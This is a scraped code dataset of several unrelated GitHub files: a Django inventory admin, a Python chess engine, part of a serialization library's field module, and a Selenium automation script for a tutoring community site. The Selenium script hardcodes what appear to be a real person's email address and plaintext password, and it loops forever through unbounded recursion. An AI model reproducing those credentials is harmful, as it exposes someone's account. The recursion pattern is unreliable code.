transparent=True)","repo_name":"neurodatascience/fmralign-tutorials","sub_path":"images/logo_generation/logo.py","file_name":"logo.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"4185512964","text":"from django.contrib import admin\nfrom inventory.models import Inventory\n\n\nclass InventoryAdmin(admin.ModelAdmin):\n list_display = [\"variant\", \"available\", \"sold\"]\n search_fields = [\"variant__product__name\"]\n list_filter = [\"variant__product__category__name\"]\n readonly_fields = [\"sold\"]\n\n\nadmin.site.register(Inventory, InventoryAdmin)\n","repo_name":"Prabin-Kumar-Baniya-NP/e-commerce-django","sub_path":"ecommerce/inventory/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23263958559","text":"class Board:\n\n def __init__(self):\n self.player_to_move = 'w'\n self.game_log = []\n self.board = {'a8': False, 'b8': False, 'c8': False, 'd8': False, 'e8': False, 'f8': False, 'g8': False, 'h8': False,\n 'a7': False, 'b7': False, 'c7': False, 'd7': False, 'e7': False, 'f7': False, 'g7': False, 'h7': False,\n 'a6': False, 'b6': False, 'c6': False, 'd6': False, 'e6': False, 'f6': False, 'g6': False, 'h6': False,\n 'a5': False, 'b5': False, 'c5': False, 'd5': False, 'e5': False, 'f5': False, 'g5': False, 'h5': False,\n 'a4': False, 'b4': False, 'c4': False, 'd4': False, 'e4': False, 'f4': False, 'g4': False, 'h4': False,\n 'a3': False, 'b3': False, 'c3': False, 'd3': False, 'e3': False, 'f3': False, 'g3': False, 'h3': False,\n 'a2': False, 'b2': False, 'c2': False, 'd2': False, 'e2': False, 'f2': False, 'g2': False, 'h2': False,\n 'a1': False, 'b1': False, 'c1': False, 'd1': False, 'e1': False, 'f1': False, 'g1': False, 'h1': False}\n\n def switch_player(self):\n if self.player_to_move == 'w':\n self.player_to_move = 'b'\n else:\n self.player_to_move = 'w'\n\n def check_if_check(self, K_square):\n for i in self.board:\n j = self.board[i]\n if j and j.kind != 'K':\n squares = Moves().arbitrary(i, self.board)\n if K_square in squares:\n return True\n elif j and j.kind == 'K' and j.colour != self.board[K_square].colour:\n squares = Moves().arbitrary(i, self.board)\n if K_square in squares:\n return True\n\n def find_pieces(self, desired_kind, desired_colour):\n squares_with_pieces = []\n for i in self.board:\n if self.board[i] and self.board[i].colour == desired_colour and self.board[i].kind == desired_kind:\n squares_with_pieces.append(i)\n return squares_with_pieces\n\n def check_for_move(self, start_square, end_square): # simulates desired move and checks for checks returns board as it was given\n temp_figure = self.board[start_square]\n if not temp_figure:\n return False\n else:\n possible_end_squares = Moves().arbitrary(start_square, self.board)\n\n if end_square not in possible_end_squares:\n return False\n else:\n target = self.board[end_square]\n self.board[start_square] = False\n self.board[end_square] = temp_figure\n king_square = self.find_pieces('K', temp_figure.colour)[0]\n if self.check_if_check(king_square):\n self.board[start_square] = temp_figure\n self.board[end_square] = target\n return False\n self.board[start_square] = temp_figure\n self.board[end_square] = target\n return True\n\n def promotion(self, desired_promotion, start_square, end_square):\n temp_figure = self.board[start_square]\n temp_figure.kind = desired_promotion\n self.board[end_square] = temp_figure\n self.board[start_square] = False\n temp_figure.move_log.append(end_square + '=' + desired_promotion)\n self.game_log.append(end_square + '=' + desired_promotion)\n self.switch_player()\n\n def castle(self, K_square, K_end_square, kind):\n if kind == 'long':\n R_square = 'a'\n R_end_square = 'd'\n move = 'O-O-O'\n else:\n R_square = 'h'\n R_end_square = 'f'\n move = 'O-O'\n if self.board[K_square].colour == 'b':\n temp_number = '8'\n else:\n temp_number = '1'\n R_square += temp_number\n R_end_square += temp_number\n self.board[K_end_square] = self.board[K_square]\n self.board[K_square] = False\n self.board[R_end_square] = self.board[R_square]\n self.board[R_square] = False\n self.game_log.append(move)\n self.board[K_end_square].move_log.append(move)\n self.board[R_end_square].move_log.append(move)\n self.switch_player()\n return kind.capitalize() + ' Castling'\n\n def en_passant(self, P_square, P_end_square, direction):\n if self.board[P_square].colour == 'b':\n row = '4'\n else:\n row = '5'\n temp_figure = self.board[P_square]\n taken_figure = self.board[chr(ord(P_square[0]) + int(direction)) + row]\n self.board[P_end_square] = temp_figure\n self.board[P_square] = False\n self.board[chr(ord(P_square[0]) + int(direction)) + row] = False\n if self.check_if_check((self.find_pieces('K', temp_figure.colour)[0])):\n self.board[P_square] = temp_figure\n self.board[P_end_square] = False\n self.board[chr(ord(P_square[0]) + int(direction)) + row] = taken_figure\n return False\n else:\n temp_figure.move_log.append(P_end_square)\n self.game_log.append(temp_figure.kind + P_end_square)\n self.switch_player()\n return 'En Passant'\n\n def move(self, start_square, end_square): # preforms the move + castling + promotion + en passant\n temp_figure = self.board[start_square]\n if not temp_figure:\n return False\n elif self.player_to_move != temp_figure.colour:\n return False\n# castling\n elif temp_figure.kind == 'K' and start_square == 'e1' and end_square == 'c1':\n if self.check_for_move('e1', 'd1') and self.check_for_move('e1', 'c1') and not self.check_if_check('e1'):\n return self.castle(start_square, end_square, 'long')\n elif temp_figure.kind == 'K' and start_square == 'e1' and end_square == 'g1':\n if self.check_for_move('e1', 'f1') and self.check_for_move('e1', 'g1') and not self.check_if_check('e1'):\n return self.castle(start_square, end_square, 'short')\n elif temp_figure.kind == 'K' and start_square == 'e8' and end_square == 'c8':\n if self.check_for_move('e8', 'd8') and self.check_for_move('e8', 'c8') and not self.check_if_check('e8'):\n return self.castle(start_square, end_square, 'long')\n elif temp_figure.kind == 'K' and start_square == 'e8' and end_square == 'g8':\n if self.check_for_move('e8', 'f8') and self.check_for_move('e8', 'g8') and not self.check_if_check('e8'):\n return self.castle(start_square, end_square, 'short')\n# promotion\n elif temp_figure.kind == 'P' and end_square[1] == '8' and temp_figure.colour == 'w' and self.check_for_move(start_square, end_square):\n return 'Black Promotion'\n elif temp_figure.kind == 'P' and end_square[1] == '1' and temp_figure.colour == 'b' and self.check_for_move(start_square, end_square):\n return 'White Promotion'\n# en passant\n elif temp_figure.kind == 'P' and start_square[1] == '5' and temp_figure.colour == 'w' and not self.board[end_square] and (end_square[0] == chr(ord(start_square[0]) + 1) or end_square[0] == chr(ord(start_square[0]) - 1)):\n if self.game_log[-1] == 'P' + chr(ord(start_square[0]) + 1) + '5' and len(self.board[chr(ord(start_square[0]) + 1) + '5'].move_log) == 1:\n return self.en_passant(start_square, end_square, '1')\n if self.game_log[-1] == 'P' + chr(ord(start_square[0]) - 1) + '5' and len(self.board[chr(ord(start_square[0]) - 1) + '5'].move_log) == 1:\n return self.en_passant(start_square, end_square, '-1')\n elif temp_figure.kind == 'P' and start_square[1] == '4' and temp_figure.colour == 'b' and not self.board[end_square] and (end_square[0] == chr(ord(start_square[0]) + 1) or end_square[0] == chr(ord(start_square[0]) - 1)):\n if self.game_log[-1] == 'P' + chr(ord(start_square[0]) + 1) + '4' and len(self.board[chr(ord(start_square[0]) + 1) + '4'].move_log) == 1:\n return self.en_passant(start_square, end_square, '1')\n if self.game_log[-1] == 'P' + chr(ord(start_square[0]) - 1) + '4' and len(self.board[chr(ord(start_square[0]) - 1) + '4'].move_log) == 1:\n return self.en_passant(start_square, end_square, '-1')\n# else\n elif self.check_for_move(start_square, end_square):\n self.board[start_square] = False\n self.board[end_square] = temp_figure\n temp_figure.move_log.append(end_square)\n self.game_log.append(temp_figure.kind + end_square)\n self.switch_player()\n return 'Move'\n else:\n return False\n\n def start_game(self):\n for i in self.board:\n self.board[i] = False\n self.board['e8'] = Piece('K', 'b', [])\n self.board['d8'] = Piece('Q', 'b', [])\n self.board['f8'] = Piece('B', 'b', [])\n self.board['c8'] = Piece('B', 'b', [])\n self.board['g8'] = Piece('N', 'b', [])\n self.board['b8'] = Piece('N', 'b', [])\n self.board['h8'] = Piece('R', 'b', [])\n self.board['a8'] = Piece('R', 'b', [])\n self.board['a7'] = Piece('P', 'b', [])\n self.board['b7'] = Piece('P', 'b', [])\n self.board['c7'] = Piece('P', 'b', [])\n self.board['d7'] = Piece('P', 'b', [])\n self.board['e7'] = Piece('P', 'b', [])\n self.board['f7'] = Piece('P', 'b', [])\n self.board['g7'] = Piece('P', 'b', [])\n self.board['h7'] = Piece('P', 'b', [])\n\n self.board['e1'] = Piece('K', 'w', [])\n self.board['d1'] = Piece('Q', 'w', [])\n self.board['f1'] = Piece('B', 'w', [])\n self.board['c1'] = Piece('B', 'w', [])\n self.board['g1'] = Piece('N', 'w', [])\n self.board['b1'] = Piece('N', 'w', [])\n self.board['h1'] = Piece('R', 'w', [])\n self.board['a1'] = Piece('R', 'w', [])\n self.board['a2'] = Piece('P', 'w', [])\n self.board['b2'] = Piece('P', 'w', [])\n self.board['c2'] = Piece('P', 'w', [])\n self.board['d2'] = Piece('P', 'w', [])\n self.board['e2'] = Piece('P', 'w', [])\n self.board['f2'] = Piece('P', 'w', [])\n self.board['g2'] = Piece('P', 'w', [])\n self.board['h2'] = Piece('P', 'w', [])\n self.game_log = []\n self.player_to_move = 'w'\n\n\nclass Moves:\n\n def is_on_playboard(self, square):\n if 0 < ord(square[0]) - 96 < 9 and 0 < int(square[1:]) < 9:\n return True\n else:\n return False\n\n def arbitrary(self, test_square, playboard):\n temp_figure = playboard[test_square]\n if temp_figure:\n if temp_figure.kind == 'K':\n return Moves().K(test_square, playboard)\n elif temp_figure.kind == 'Q':\n return Moves().Q(test_square, playboard)\n elif temp_figure.kind == 'R':\n return Moves().R(test_square, playboard)\n elif temp_figure.kind == 'B':\n return Moves().B(test_square, playboard)\n elif temp_figure.kind == 'N':\n return Moves().N(test_square, playboard)\n elif temp_figure.kind == 'P':\n return Moves().P(test_square, playboard)\n\n def check_if_ok(self, square, test_square, playboard): # does not check if given square is inside playboard\n if not playboard[square]:\n return 1\n elif playboard[square].colour != playboard[test_square].colour:\n return 2\n elif playboard[square].colour == playboard[test_square].colour:\n return 3\n\n def straight_move(self, square, direction, sign, playboard):\n if direction == 'horizontal':\n letter_coef = sign\n number_coef = 0\n else:\n letter_coef = 0\n number_coef = sign\n i = 1\n possible_squares = []\n while self.is_on_playboard(chr(ord(square[0]) + i * letter_coef) + str(int(square[1]) + i * number_coef)):\n temp_square = chr(ord(square[0]) + i * letter_coef) + str(int(square[1]) + i * number_coef)\n if self.check_if_ok(temp_square, square, playboard) == 1:\n possible_squares.append(temp_square)\n i += 1\n elif self.check_if_ok(temp_square, square, playboard) == 2:\n possible_squares.append(temp_square)\n break\n else:\n break\n return possible_squares\n\n def diagonal_move(self, square, vertical_sign, horizontal_sign, playboard):\n possible_squares = []\n i = 1\n while self.is_on_playboard(chr(ord(square[0]) + i * horizontal_sign) + str(int(square[1]) + i * vertical_sign)):\n temp_square = chr(ord(square[0]) + i * horizontal_sign) + str(int(square[1]) + i * vertical_sign)\n if self.check_if_ok(temp_square, square, playboard) == 1:\n possible_squares.append(temp_square)\n i += 1\n elif self.check_if_ok(temp_square, square, playboard) == 2:\n possible_squares.append(temp_square)\n break\n else:\n break\n return possible_squares\n\n def K(self, test_square, playboard):\n possible_squares = []\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n temp_square = chr(ord(test_square[0]) + j) + str(int(test_square[1]) + i)\n if self.is_on_playboard(temp_square) and self.check_if_ok(temp_square, test_square, playboard) in [1, 2]:\n possible_squares.append(temp_square)\n\n if playboard[test_square].move_log == []: # for check_for_move to work - castling\n if playboard[test_square].colour == 'w':\n if playboard['a1'] and playboard['a1'].kind == 'R' and playboard['a1'].move_log == [] and not playboard['b1'] and not playboard['c1'] and not playboard['d1']:\n possible_squares.append('c1')\n if playboard['h1'] and playboard['h1'].kind == 'R' and playboard['h1'].move_log == [] and not playboard['f1'] and not playboard['g1']:\n possible_squares.append('g1')\n if playboard[test_square].colour == 'b':\n if playboard['a8'] and playboard['a8'].kind == 'R' and playboard['a8'].move_log == [] and not playboard['b8'] and not playboard['c8'] and not playboard['d8']:\n possible_squares.append('c8')\n if playboard['h8'] and playboard['h8'].kind == 'R' and playboard['h8'].move_log == [] and not playboard['f8'] and not playboard['g8']:\n possible_squares.append('g8')\n\n return possible_squares\n\n def Q(self, test_square, playboard):\n return self.R(test_square, playboard) + self.B(test_square, playboard)\n\n def R(self, test_square, playboard):\n possible_squares = self.straight_move(test_square, 'horizontal', 1, playboard)\n possible_squares += self.straight_move(test_square, 'horizontal', -1, playboard)\n possible_squares += self.straight_move(test_square, 'vertical', 1, playboard)\n possible_squares += self.straight_move(test_square, 'vertical', -1, playboard)\n return possible_squares\n\n def B(self, test_square, playboard):\n possible_squares = self.diagonal_move(test_square, 1, 1, playboard)\n possible_squares += self.diagonal_move(test_square, 1, -1, playboard)\n possible_squares += self.diagonal_move(test_square, -1, -1, playboard)\n possible_squares += self.diagonal_move(test_square, -1, 1, playboard)\n return possible_squares\n\n def N(self, test_square, playboard):\n possible_squares = []\n\n for i in [-2, 2]:\n for j in [-1, 1]:\n temp_square1 = chr(ord(test_square[0]) + i) + str(int(test_square[1]) + j)\n temp_square2 = chr(ord(test_square[0]) + j) + str(int(test_square[1]) + i)\n if self.is_on_playboard(temp_square1) and temp_square1 != test_square:\n if self.check_if_ok(temp_square1, test_square, playboard) in [1, 2]:\n possible_squares.append(temp_square1)\n if self.is_on_playboard(temp_square2) and temp_square2 != test_square:\n if self.check_if_ok(temp_square2, test_square, playboard) in [1, 2]:\n possible_squares.append(temp_square2)\n return possible_squares\n\n def P(self, test_square, playboard): # en passant and promotion entairely carried out in move\n possible_squares = []\n if playboard[test_square].colour == 'w':\n coef = 1\n start_line = '2'\n else:\n coef = -1\n start_line = '7'\n temp_square1 = test_square[0] + str(int(test_square[1]) + 1 * coef)\n temp_square2 = test_square[0] + str(int(test_square[1]) + 2 * coef)\n if self.is_on_playboard(temp_square1) and not playboard[temp_square1]:\n possible_squares.append(temp_square1)\n if self.is_on_playboard(temp_square2) and test_square[1] == start_line and not playboard[temp_square2] and not playboard[temp_square1]:\n possible_squares.append(temp_square2)\n for i in [1, -1]:\n temp_square = chr(ord(test_square[0]) + i) + str(int(test_square[1]) + 1 * coef)\n if self.is_on_playboard(temp_square) and playboard[temp_square] and playboard[temp_square].colour != playboard[test_square].colour:\n possible_squares.append(temp_square)\n return possible_squares\n\n\nclass Piece:\n\n def __init__(self, kind, colour, possible_squares):\n self.kind = kind\n self.colour = colour\n self.possible_squares = possible_squares\n self.move_log = []\n\n def encode(self): # utf-8 html for piece (missing &# needed)\n i = 0\n if self.kind == 'K':\n i += 12\n elif self.kind == 'Q':\n i += 13\n elif self.kind == 'R':\n i += 14\n elif self.kind == 'B':\n i += 15\n elif self.kind == 'N':\n i += 16\n elif self.kind == 'P':\n i += 17\n if self.colour == 'b':\n i += 6\n\n return int('98' + str(i))\n","repo_name":"grlj/UVP_chess","sub_path":"chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":18202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26675411177","text":"def get_doubt(take_up_xpath):\n try:\n element = WebDriverWait(browser, 10000000).until(\n EC.presence_of_element_located((By.XPATH, take_up_xpath))\n\n )\n element.click()\n finally:\n get_doubt(take_up_xpath)\n\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nbrowser = webdriver.Chrome('/home/amarjeet-pc/Downloads/chromedriver_linux64/chromedriver')\nbrowser.get('https://community.toppr.com/')\nbrowser.maximize_window()\nbrowser.implicitly_wait(10)\nelem1 = browser.find_element_by_xpath(xpath='//*[@id=\"app\"]/div/div/div[1]/div/div[1]/div[2]/button[1]')\nelem1.click()\nbrowser.implicitly_wait(2)\nelem2 = browser.find_element_by_id('email-login')\nelem3 = browser.find_element_by_id('password-login')\nelem2.send_keys('amarjeet.ans.sinha@gmail.com')\nelem3.send_keys('ansu2678')\nelem4 = browser.find_element_by_xpath('//*[@id=\"login_modal_form\"]/button[2]')\nelem4.click()\nelem5 = browser.find_element_by_xpath('//*[@id=\"index-headjs-page\"]/body/div[5]/div/div[2]/div[4]/div/div[5]/a')\nelem5.click()\nhandles = browser.window_handles\nparent_handle = browser.current_window_handle\nfor handle in handles:\n if parent_handle != handle:\n browser.switch_to_window(handle)\n\ntake_up_xpath = '//*[@id=\"root\"]/div/div[2]/div[2]/div[2]/div/div/div[2]/div/div[3]/div[2]/button'\n\nget_doubt(take_up_xpath)\n","repo_name":"Amarjeet2629/MyPycharmProjects","sub_path":"toppr/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17419643156","text":"from collections import defaultdict\n\nfrom .exception import FieldError, FieldInvalid, FieldOptsError\nfrom .utils import set_creation_order\nfrom .pipelines import (\n StringMarshalPipeline, StringSerializePipeline,\n StaticSerializePipeline,\n IntegerMarshalPipeline, IntegerSerializePipeline,\n NestedMarshalPipeline, NestedSerializePipeline,\n CollectionMarshalPipeline, CollectionSerializePipeline,\n BooleanMarshalPipeline, BooleanSerializePipeline,\n DateTimeSerializePipeline, DateTimeMarshalPipeline,\n DateMarshalPipeline, DateSerializePipeline,\n DecimalSerializePipeline, DecimalMarshalPipeline,\n FloatSerializePipeline, FloatMarshalPipeline)\nfrom .pipelines.base import run_pipeline, Session\nfrom .pipelines.marshaling import MarshalPipeline\nfrom .pipelines.serialization import SerializePipeline\n\nDEFAULT_ERROR_MSGS = {\n 'required': 'This is a required field',\n 'type_error': 'Invalid type',\n 'not_found': '{name} not found',\n 'none_not_allowed': 'This field cannot be null',\n 'invalid_choice': 'invalid choice',\n 'duplicates': 'duplicates found',\n 'out_of_bounds': 'value out of allowed range',\n}\n\n\nclass FieldOpts(object):\n \"\"\"FieldOpts are used to provide configuration options to :class:`.Field`.\n They are designed to allow users to easily provide custom configuration\n options to :class:`.Field` classes.\n\n Custom :class:`.FieldOpts` classes are set on :class:`.Field` using the\n ``opts_class`` property.\n\n .. code-block:: python\n\n class MyFieldOpts(FieldOpts):\n\n def __init__(self, **opts):\n\n self.some_property = opts.get('some_property', None)\n super(MyFieldOpts, self).__init__(**opts)\n\n .. seealso::\n :class:`.Field`\n \"\"\"\n\n extra_error_msgs = {}\n\n def __init__(self, **opts):\n \"\"\" Construct a new instance of :class:`FieldOpts`\n and set config options\n\n :param name: Specify the name of the field for data output\n :param required: This field must be present when marshaling\n :param attribute_name: Specify internal name for this field, set on\n mapper.fields dict\n :param source: Specify the name of the attribute on the object to use\n when getting/setting data. May be ``__self__`` to use entire mapper\n object as data\n :param default: Specify a default value for this field to apply when\n serializing or marshaling\n :param allow_none: This option only takes affect if required=False. If\n allow_none=False and required=False, then Kim will accept either\n the field being missing completely from the data, or the field\n being passed with a non-None value. That is, either ``{}`` or\n ``{'field': 'value'}`` but never ``{'field': None}``. Default True.\n :param read_only: Specify if this field should be ignored when marshaling\n :param error_msgs: A dict of error_type: error messages.\n :param null_default: Specify the default type to return when a field is\n null IE None or {} or ''\n :param choices: Specify a list of valid values\n :param extra_serialize_pipes: dict of lists containing extra Pipe functions\n to be run at the end of each stage when serializing.\n eg ``{'output': [my_pipe, my_other_pipe]}```\n :param extra_marshal_pipes: dict of lists containing extra Pipe functions\n to be run at the end of each stage when marshaling.\n eg ``{'validate': [my_pipe, my_other_pipe]}```\n\n :raises: :class:`.FieldOptsError`\n :returns: None\n \"\"\"\n\n self._opts = opts.copy()\n\n # internal attrs\n self._is_wrapped = opts.pop('_is_wrapped', False)\n\n # set attribute_name, name and source options.\n name = opts.pop('name', None)\n attribute_name = opts.pop('attribute_name', None)\n source = opts.pop('source', None)\n\n self.name, self.attribute_name, self.source = None, None, None\n\n self.set_name(name=name, attribute_name=attribute_name, source=source)\n\n self.error_msgs = DEFAULT_ERROR_MSGS.copy()\n self.error_msgs.update(opts.pop('error_msgs', self.extra_error_msgs))\n\n self.required = opts.pop('required', True)\n self.default = opts.pop('default', None)\n self.null_default = opts.pop('null_default', None)\n\n self.allow_none = opts.pop('allow_none', True)\n self.read_only = opts.pop('read_only', False)\n self.choices = opts.pop('choices', None)\n\n self.extra_marshal_pipes = \\\n opts.pop('extra_marshal_pipes', defaultdict(list))\n self.extra_serialize_pipes = \\\n opts.pop('extra_serialize_pipes', defaultdict(list))\n\n self.validate()\n\n def validate(self):\n \"\"\"Allow users to perform checks for required config options. Concrete\n classes should raise :class:`.FieldError` when invalid configuration\n is encountered.\n\n A slightly contrived example is requiring all fields to be\n ``read_only=True``\n\n Usage::\n\n from kim.field import FieldOpts\n\n class MyOpts(FieldOpts):\n\n def validate(self):\n\n if self.read_only is True:\n raise FieldOptsError('Field cannot be read only')\n\n\n :raises: `.FieldOptsError`\n :returns: None\n \"\"\"\n pass\n\n def set_name(self, name=None, attribute_name=None, source=None):\n \"\"\"Programmatically set the name properties for a field.\n\n Names cascade from each other unless they are explicitly overridden.\n\n Example 1:\n class MyMapper(Mapper):\n foo = field.String()\n\n attribute_name = foo\n name = foo\n source = foo\n\n Example 2:\n class MyMapper(Mapper):\n foo = field.String(name='bar', source='baz')\n\n attribute_name = foo\n name = bar\n source = baz\n\n :param name: value of name property\n :param attribute_name: value of attribute_name property\n :param source: value of source property\n\n :returns: None\n \"\"\"\n self.attribute_name = self.attribute_name or attribute_name\n self.name = self.name or name or self.attribute_name\n self.source = self.source or source or self.name\n\n def get_name(self):\n \"\"\"Return the name property set by :meth:`set_name`\n\n :rtype: str\n :returns: the name of the field to be used in input/output\n \"\"\"\n\n return self.name\n\n\nclass Field(object):\n \"\"\"Field, as it's name suggests, represents a single key or 'field'\n inside of your mappings. Much like columns in a database or a csv,\n they provide a way to represent different data types when pushing data\n into and out of your Mappers.\n\n A core concept of Kims architecture is that of Pipelines.\n Every Field makes use of both an Input and Output pipeline which affords users\n a great level of flexibility when it comes to handling data.\n\n Kim provides a collection of default Field implementations,\n for more complex cases extending Field to create new field types\n couldn't be easier.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n\n id = field.Integer(required=True, read_only=True)\n name = field.String(required=True)\n \"\"\"\n\n #: The :class:`FieldOpts` field config class to use for the Field.\n opts_class = FieldOpts\n\n #: The Fields marshaling pipeline\n marshal_pipeline = MarshalPipeline\n\n #: The Fields serialization pipeline\n serialize_pipeline = SerializePipeline\n\n def __init__(self, *args, **field_opts):\n \"\"\"Constructs a new instance of Field. Each Field accepts a set of\n kwargs that will be passed directly to the fields\n defined :class:`FieldOpts`.\n\n :param args: list of arguments passed to the field\n :param kwargs: keyword arguments typically passed to the FieldOpts class attached\n to this Field.\n :raises: :class:`FieldOptsError`\n :returns: None\n\n .. seealso::\n :class:`FieldOpts`\n \"\"\"\n\n try:\n self.opts = self.opts_class(*args, **field_opts)\n except FieldOptsError as e:\n msg = '{0} field has invalid options: {1}' \\\n .format(self.__class__.__name__, e.message)\n raise FieldError(msg)\n\n set_creation_order(self)\n\n self.marshal_pipes = self.marshal_pipeline.get_pipeline(\n **self.opts.extra_marshal_pipes\n )\n self.serialize_pipes = self.serialize_pipeline.get_pipeline(\n **self.opts.extra_serialize_pipes\n )\n\n def get_error(self, error_type):\n \"\"\"Return the error message for ``error_type`` from the error messages defined on\n the fields opts class.\n\n :param error_type: the key of the error found in self.error_msgs\n :returns: Error message\n :rtype: string\n \"\"\"\n\n parse_opts = {\n 'name': self.name\n }\n return self.opts.error_msgs[error_type].format(**parse_opts)\n\n def invalid(self, error_type):\n \"\"\"Raise an Exception using the provided error_type for the error message.\n This method is typically used by pipes to allow :class:`Field` to control\n how its errors are handled.\n\n Usage::\n\n @pipe()\n def validate_name(session):\n if session.data and session.data != 'Mike Waites':\n raise session.fied.invalid('not_mike')\n\n :param error_type: The key of the error being raised.\n :raises: :class:`FieldInvalid`\n\n .. seealso::\n :class:`FieldOpts` for an explanation on defining error messags\n \"\"\"\n\n raise FieldInvalid(self.get_error(error_type), field=self)\n\n @property\n def name(self):\n \"\"\"Proxy access to the :class:`FieldOpts` defined for this field.\n\n :rtype: str\n :returns: The value of get_name from FieldOpts\n :raises: :class:`FieldError`\n\n .. seealso::\n :meth:`kim.field.FieldOpts.get_name`\n \"\"\"\n\n field_name = self.opts.get_name()\n if not field_name:\n cn = self.__class__.__name__\n raise FieldError('{0} requires {0}.name or '\n '{0}.attribute_name. Please provide a `name` '\n 'or `attribute_name` param to {0}'.format(cn))\n\n return field_name\n\n @name.setter\n def name(self, name):\n \"\"\"Proxy setting the name property via :py:meth:`kim.field.FieldOpts.set_name`\n\n :param name: the value to set against FieldOpts name property\n :returns: None\n\n .. seealso::\n :meth:`kim.field.FieldOpts.set_name`\n \"\"\"\n self.opts.set_name(name)\n\n def marshal(self, mapper_session, **opts):\n \"\"\"Run the marshal :class:`Pipeline` for this field for the given ``data`` and\n update the output for this field inside of the mapper_session.\n\n :param mapper_session: The Mappers marshaling session this field is being\n run inside of.\n :opts: kwargs passed to the marshal pipelines run method.\n :returns: None\n\n .. seealso::\n :meth:`kim.mapper.Mapper.marshal`\n \"\"\"\n\n parent = opts.get('parent_session', None)\n session = Session(\n self, mapper_session.data, mapper_session.output,\n mapper_session=mapper_session,\n parent=parent)\n run_pipeline(self.marshal_pipes, session, self, **opts)\n\n def serialize(self, mapper_session, **opts):\n \"\"\"Run the serialize :class:`Pipeline` for this field for the given `data` and\n update `output` in for this field inside of the mapper_session.\n\n :param mapper_session: The Mappers marshaling session this field is being\n run inside of.\n :opts: kwargs passed to the marshal pipelines run method.\n :returns: None\n\n .. seealso::\n :meth:`kim.mapper.Mapper.serialize`\n \"\"\"\n parent = opts.get('parent_session', None)\n session = Session(\n self, mapper_session.data, mapper_session.output,\n mapper_session=mapper_session,\n parent=parent)\n\n run_pipeline(self.serialize_pipes, session, self, **opts)\n\n\nclass StringFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`String`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\" Construct a new instance of :class:`StringFieldOpts`\n and set config options\n\n :param max: Specify the maximum permitted length\n :param min: Specify the minimum permitted length\n :param blank: If False, raise error if empty string passed. Default True\n\n :raises: :class:`FieldOptsError`\n :returns: None\n \"\"\"\n self.max = kwargs.pop('max', None)\n self.min = kwargs.pop('min', None)\n self.blank = kwargs.pop('blank', True)\n super(StringFieldOpts, self).__init__(**kwargs)\n\n\nclass String(Field):\n \"\"\":class:`String` represents a value that must be valid\n when passed to str()\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n name = field.String(required=True)\n\n \"\"\"\n opts_class = StringFieldOpts\n marshal_pipeline = StringMarshalPipeline\n serialize_pipeline = StringSerializePipeline\n\n\nclass IntegerFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Integer`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\" Construct a new instance of :class:`IntegerFieldOpts`\n and set config options\n\n :param max: Specify the maximum permitted value\n :param min: Specify the minimum permitted value\n\n :raises: :class:`FieldOptsError`\n :returns: None\n \"\"\"\n self.max = kwargs.pop('max', None)\n self.min = kwargs.pop('min', None)\n super(IntegerFieldOpts, self).__init__(**kwargs)\n\n\nclass Integer(Field):\n \"\"\":class:`Integer` represents a value that must be valid\n when passed to int()\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n id = field.Integer(required=True, min=1, max=10)\n\n \"\"\"\n\n opts_class = IntegerFieldOpts\n marshal_pipeline = IntegerMarshalPipeline\n serialize_pipeline = IntegerSerializePipeline\n\n\nclass FloatFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Float`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\" Construct a new instance of :class:`FloatFieldOpts`\n and set config options\n\n\n :param precision: Specify the precision of the float\n :param max: Specify the maximum permitted value\n :param min: Specify the minimum permitted value\n\n :raises: :class:`FieldOptsError`\n :returns: None\n \"\"\"\n self.precision = kwargs.pop('precision', 5)\n self.max = kwargs.pop('max', None)\n self.min = kwargs.pop('min', None)\n super(FloatFieldOpts, self).__init__(**kwargs)\n\n\nclass Float(Field):\n \"\"\":class:`Float` represents a value that must be valid\n Float type.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n score = field.Float(precision=4)\n\n \"\"\"\n\n opts_class = FloatFieldOpts\n marshal_pipeline = FloatMarshalPipeline\n serialize_pipeline = FloatSerializePipeline\n\n\nclass Decimal(Float):\n \"\"\":class:`Decimal` represents a value that must be valid\n when passed to decimal.Decimal()\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n score = field.Decimal(precision=4, min=0, max=1.5)\n\n \"\"\"\n\n opts_class = FloatFieldOpts\n marshal_pipeline = DecimalMarshalPipeline\n serialize_pipeline = DecimalSerializePipeline\n\n\nclass BooleanFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Boolean`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\" Construct a new instance of :class:`BooleanFieldOpts`\n and set config options\n\n :param true_boolean_values: Specify an array of values that will validate as\n being 'true' when the field is marshaled.\n :param false_boolean_values: Specify an array of values that will validate as\n being 'false' when the field is marshaled.\n\n :raises: :class:`FieldOptsError`\n :returns: None\n \"\"\"\n self.true_boolean_values = \\\n kwargs.pop('true_boolean_values',\n [True, 'true', '1', 1, 'True'])\n self.false_boolean_values = \\\n kwargs.pop('false_boolean_values',\n 